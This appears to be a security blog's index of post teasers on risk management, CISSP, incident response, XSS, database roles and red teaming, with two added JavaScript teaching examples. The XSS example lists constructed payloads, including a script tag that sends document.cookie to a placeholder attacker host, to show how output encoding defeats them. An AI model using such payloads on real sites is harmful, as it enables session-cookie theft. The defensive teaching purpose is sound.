Risk management is essential to the success of every company

In business, risk is the likelihood that a loss will occur if a threat exploits a vulnerability. An organization must take risks to thrive, but it cannot afford to ignore them. The key is to understand its threats and vulnerabilities, and then mitigate the threats to those vulnerabilities… Read More »

Greg Palmer

Certified Information Systems Security Professional (CISSP)

ISC2 CISSP Certification Requirements. (ISC)2 sets the following requirements and recommendations for earning and maintaining the Certified Information Systems Security Professional (CISSP) certification. Candidates must have a minimum of five years of cumulative, paid, full-time work experience in two or more of the eight domains of the (ISC)2 CISSP CBK. Candidates may receive a one-year experience waiver… Read More »

Greg Palmer

Ethics Related to the Collection of Information. Who Benefits?

The following are ethical questions that must be addressed when information systems are designed, together with how each relates to the confidentiality, integrity, and availability (CIA) security concept. The first concern is: who benefits from the information collected? The applicable area of the CIA triad is confidentiality. Information collected for… Read More »

Greg Palmer

Information Security Publication Comparison

Chart comparing major sections of the USPS Handbook AS-805 – Information Security to NIST Special Publications 800-12, 800-14, 800-18, 800-26, and 800-30. Handbook AS-805 – Information Security (USPS, 2015) sections are mapped to NIST Special Publications as follows: Introduction: Corporate Information Security maps to Generally Accepted System Security Principles (NIST SP 800-14); Security Roles and Responsibilities maps to System Security Plan Responsibilities (NIST SP… Read More »

Greg Palmer

Information System Incident Response & IRT’s

Effective information system incident response requires proper planning and good management. Because organizations are diverse and vary in size, each must design its incident response plan based on a detailed assessment of its information systems and business requirements. Constructing a proficient Incident Response Team (IRT) is a critical component of any effective incident response plan… Read More »

Greg Palmer

Computer Incident Response Teams & Incident Response Policy

Computer Incident Response Teams (CIRTs or IRTs) are key components of information security incident response. Effective incident response doesn’t just happen; it takes careful planning and practice. An effective incident response policy should be backed by a plan that documents the steps to be followed and lays out key tasks or milestones with their details, processes, and procedures… Read More »

Greg Palmer

Cross-Site Scripting (XSS) Attacks

Cross-site scripting attacks can occur when data enters a web application through an untrusted source (most often a web request) and is then included in dynamic content sent to a web user without being validated or output-encoded for the context it lands in. The malicious content is usually JavaScript, but may also be HTML, Flash, or any other type of code that the browser can… Read More »

Greg Palmer
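The XSS teaser above describes the two conditions that produce the bug: untrusted data, and dynamic output that does not encode it. The following is an added example (not code from the original post) that puts a vulnerable render function next to a fixed one and feeds both the same constructed attacker input. The user names, payloads, and the `attacker.example` host are all constructed for illustration. Note that the encoder shown is correct only for HTML text and quoted-attribute context; data placed inside a script block, a URL, or a style needs a different encoder.

```javascript
// Added example, not code from the original post. The "username" values are
// constructed attacker input; attacker.example is a placeholder host.

// Vulnerable: untrusted data is spliced straight into markup, so whoever
// controls the value controls what the browser parses.
function renderUnsafe(username) {
  return `<p>Welcome, ${username}!</p>`;
}

// Output-encode for HTML text and double-quoted attribute contexts. Every
// character that can open a tag, entity or attribute becomes an entity.
// Other contexts (inside <script>, a URL, a CSS value) need their own encoder;
// this one is only correct for HTML body/attribute text.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: the same template, but the untrusted value is encoded first.
function renderSafe(username) {
  return `<p>Welcome, ${escapeHtml(username)}!</p>`;
}

// Constructed payloads. The second one carries no <script> tag at all: it is
// plain HTML whose event handler runs when the broken image fails to load,
// which is why "strip <script>" is not a fix.
const PAYLOADS = [
  "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
  '<img src=x onerror="alert(document.domain)">',
];

// True when the rendered HTML still contains the payload verbatim, i.e. the
// browser would parse it as markup rather than show it as text.
function payloadSurvives(render, payload) {
  return render(payload).includes(payload);
}

for (const p of PAYLOADS) {
  console.log("unsafe keeps markup:", payloadSurvives(renderUnsafe, p));
  console.log("safe keeps markup:  ", payloadSurvives(renderSafe, p));
  console.log("safe output:        ", renderSafe(p));
}
```

Encoding at output time, for the specific context, is what neutralizes the second condition; input validation alone cannot, because legitimate data (a name like O'Brien, or a support ticket quoting HTML) often contains the same characters.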

Roles in Database Security

Separation of duties states that no single user should be given enough privileges to misuse a system on their own. Roles establish separation of duties by breaking privileges down to what each job duty requires. A role is a named group of individual privileges that corresponds to a user’s job responsibilities. For example, a role is created named… Read More »

Greg Palmer
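The roles teaser above makes two points: privileges are grouped into roles that match job duties, and the grouping is what enforces separation of duties. The following is an added example (not code from the original post) that models both: users receive privileges only through roles, and a role assignment is refused when the combined privileges would let one person perform two duties that must stay separate. The role names, privilege names, conflict pair, and user names are constructed for illustration; a real database would express the same thing with its own GRANT statements and role objects.

```javascript
// Added example, not code from the original post. The roles, privileges,
// conflict pair and user names are constructed for illustration.

// A role is a named group of individual privileges tied to one job duty.
const ROLES = {
  ap_clerk:    ["invoice.create", "invoice.read"],
  ap_approver: ["invoice.read", "invoice.approve"],
  auditor:     ["invoice.read", "audit_log.read"],
};

// Privilege pairs that must never end up in one person's hands: holding both
// would let a single user raise a payment and approve it.
const SOD_CONFLICTS = [["invoice.create", "invoice.approve"]];

// Union of the privileges granted by a set of roles.
function privilegesFor(roleNames) {
  const privs = new Set();
  for (const name of roleNames) {
    const role = ROLES[name];
    if (!role) throw new Error(`unknown role: ${name}`);
    for (const p of role) privs.add(p);
  }
  return privs;
}

// Returns the conflict pairs that a given role combination would violate.
function sodViolations(roleNames) {
  const privs = privilegesFor(roleNames);
  return SOD_CONFLICTS.filter(([a, b]) => privs.has(a) && privs.has(b));
}

// Grant roles to a user, refusing combinations that break separation of duties.
function assignRoles(user, roleNames) {
  const violations = sodViolations(roleNames);
  if (violations.length > 0) {
    const pairs = violations.map(([a, b]) => `${a} + ${b}`).join(", ");
    throw new Error(`separation-of-duties violation for ${user}: ${pairs}`);
  }
  return { user, roles: [...roleNames], privileges: privilegesFor(roleNames) };
}

// Authorization check: privileges come only through roles, never directly.
function can(account, privilege) {
  return account.privileges.has(privilege);
}

const alice = assignRoles("alice", ["ap_clerk"]);
console.log("alice can create an invoice:", can(alice, "invoice.create"));
console.log("alice can approve an invoice:", can(alice, "invoice.approve"));
try {
  assignRoles("bob", ["ap_clerk", "ap_approver"]);
} catch (e) {
  console.log("refused:", e.message);
}
```

The check runs at assignment time rather than at each access, which is where separation of duties is actually decided: once a user holds both roles, every individual access looks legitimate on its own.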

Guidelines for Media and Data Sanitizing

When information systems are taken offline and retired, great care must be taken to ensure that the media that stored the system’s data remains protected throughout the retirement process. If that media is going to be removed and discarded, or repurposed, the organization must ensure that the data stored on it is… Read More »

Greg Palmer

Developing an Effective Red Team, the Right Mind Set

Penetration testing (pen-testing) is a method of evaluating internal and external technical security controls through a methodically planned, simulated attack that imitates threats from malicious outsiders and malicious insiders, in order to understand the security weaknesses in a system and/or network. When properly executed, pen-testing is a critical tool in assessing and improving… Read More »

Greg Palmer